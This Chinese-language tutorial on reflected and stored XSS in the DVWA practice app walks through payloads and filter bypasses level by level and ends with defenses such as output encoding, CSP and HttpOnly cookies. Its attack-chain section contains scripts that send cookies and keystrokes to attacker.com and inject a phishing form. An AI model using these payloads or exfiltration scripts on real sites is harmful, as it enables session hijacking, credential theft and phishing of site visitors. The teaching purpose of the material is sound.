XSS跨站脚本攻击

XSS类型概述

三种XSS类型

  • 反射型:最常见,非持久化
  • 存储型:最危险,持久化存储
  • DOM型:基于前端JavaScript,本文不涉及

反射型XSS(Reflected XSS)

标准测试Payload

html 复制代码
<script>alert(1)</script>
<script>alert('XSS')</script>

单引号和双引号都可以使用。

漏洞识别

测试流程

复制代码
1. 输入框输入: zengjun
2. 页面返回: Hello zengjun
3. 查看源代码: <pre>Hello zengjun</pre>
4. 观察输入点位置和闭合方式

判断标准:用户输入直接反映在HTML中。

Low级别攻击

Payload

html 复制代码
zeng<script>alert('XSS')</script>jun

原理

html 复制代码
<!-- 后端代码 -->
<?php
$name = $_GET['name'];
echo "<pre>Hello " . $name . "</pre>";
?>

<!-- 渲染结果 -->
<pre>Hello zeng<script>alert('XSS')</script>jun</pre>

浏览器解析HTML时会执行<script>标签中的JavaScript代码。

Medium级别绕过

防护代码

php 复制代码
$name = str_replace('<script>', '', $_GET['name']);

绕过方法1:双写绕过

html 复制代码
<sc<script>ript>alert(1)</script>

原理

复制代码
输入: <sc<script>ript>alert(1)</script>
过滤: <sc       ript>alert(1)</script>  (中间的<script>被删除)
结果: <script>alert(1)</script>

绕过方法2:大小写绕过

html 复制代码
<sCRipt>alert(1)</script>
<SCRIPT>alert(1)</SCRIPT>

原理 :HTML不区分标签大小写,但str_replace区分。

High级别绕过

防护代码

php 复制代码
$name = preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', "", $_GET['name']);

使用正则表达式过滤所有<script>标签(包括大小写和嵌套)。

绕过方法:利用其他HTML事件

html 复制代码
<img src='x' onerror='alert(1)'/>

原理

  • src='x' - 图片路径不存在,加载失败
  • onerror - 加载失败时触发事件
  • 执行JavaScript代码

其他可用事件

html 复制代码
<img src='x' onmouseover='alert(1)'/>  <!-- 鼠标悬停 -->
<img src='x' onmousedown='alert(1)'/>  <!-- 鼠标按下 -->
<img src='x' onmouseup='alert(1)'/>    <!-- 鼠标松开 -->
<body onload='alert(1)'>               <!-- 页面加载 -->
<input onfocus='alert(1)'>             <!-- 获得焦点 -->

Impossible级别(完美防护)

php 复制代码
<?php
$name = htmlspecialchars($_GET['name']);
?>

htmlspecialchars()函数

复制代码
< 转换为 &lt;
> 转换为 &gt;
" 转换为 &quot;
' 转换为 &#039;
& 转换为 &amp;

效果:所有HTML标签都被转义为实体编码,作为纯文本显示。

html 复制代码
输入: <script>alert(1)</script>
输出: &lt;script&gt;alert(1)&lt;/script&gt;
显示: <script>alert(1)</script> (纯文本,不执行)

存储型XSS(Stored XSS)

危害分析

为什么更危险

  • 持久化存储:保存在数据库中
  • 影响范围广:所有访问者都会中招
  • 隐蔽性强:不需要诱导点击

常见场景

  • 在线留言板
  • 论坛评论
  • 用户资料页
  • 直播弹幕

Low级别攻击

测试步骤

复制代码
Name: xiaoli
Message: <script>alert('Stored XSS')</script>
点击Sign Guestbook

效果:每个访问留言板的用户都会触发弹窗。

后端代码

php 复制代码
<?php
$name = $_POST['txtName'];
$message = $_POST['mtxMessage'];

$query = "INSERT INTO guestbook (name, comment) VALUES ('$name', '$message')";
mysqli_query($conn, $query);
?>

完全没有过滤,直接存入数据库。

Medium级别绕过

防护代码

php 复制代码
$name = strip_tags($_POST['txtName']);  // 移除HTML标签
$message = $_POST['mtxMessage'];        // 留言板不过滤

问题

  • Name字段有字符长度限制(前端)
  • Message字段无过滤

绕过方法:抓包修改

复制代码
1. 输入任意内容并提交
2. Burp Suite抓包
3. 修改Name字段: 
   txtName=<sc<script>ript>alert(1)</script>
4. Forward放行

High级别绕过

防护代码

php 复制代码
$name = preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', '', $_POST['txtName']);
$message = preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', '', $_POST['mtxMessage']);

绕过方法

html 复制代码
<img src='x' onerror='alert(1)'/>

在Name字段通过抓包修改即可。

XSS攻击链

完整攻击流程

javascript 复制代码
// 1. 窃取Cookie
<script>
document.location='http://attacker.com/steal.php?cookie='+document.cookie;
</script>

// 2. 键盘记录
<script>
document.onkeypress = function(e) {
    fetch('http://attacker.com/log.php?key=' + e.key);
}
</script>

// 3. 网络钓鱼
<script>
document.body.innerHTML = '<form action="http://attacker.com/phish.php">...';
</script>

XSS防护完整方案

输入验证

php 复制代码
// 白名单验证
if(!preg_match('/^[a-zA-Z0-9_]+$/', $input)) {
    die("非法字符");
}

输出编码

php 复制代码
// HTML上下文
echo htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

// JavaScript上下文
echo json_encode($input);

// URL上下文
echo urlencode($input);

Content Security Policy

html 复制代码
<meta http-equiv="Content-Security-Policy" 
      content="default-src 'self'; script-src 'self'">

HttpOnly Cookie

php 复制代码
setcookie('session', $value, [
    'httponly' => true,  // 防止JavaScript访问
    'secure' => true,    // 仅HTTPS传输
    'samesite' => 'Strict'
]);
相关推荐
借个火er3 小时前
Vue.js 源码揭秘(一):Vue3 架构总览
前端
千寻girling3 小时前
面试官: “ 请你说一下什么是 ajax ? ”
前端·javascript
MQliferecord3 小时前
webpack的生命周期与Loader/Plugin
前端
@大迁世界3 小时前
JavaScript 框架的终结
开发语言·前端·javascript·ecmascript
PPPPickup3 小时前
easychat项目复盘---管理端系统设置
java·开发语言·前端
梦6504 小时前
Vue 实现动态路由
前端·javascript·vue.js
姜糖编程日记4 小时前
C++——初识(2)
开发语言·前端·c++
丶乘风破浪丶4 小时前
Vue项目中判断相同请求的实现方案:从原理到实战
前端·javascript·vue.js
why技术4 小时前
如果让我站在科技从业者的角度去回看 2025 年,让我选一个词出来形容它,我会选择“vibe coding”这个词。
前端·后端·程序员
worxfr4 小时前
CSS Flexbox 布局完全指南
前端·css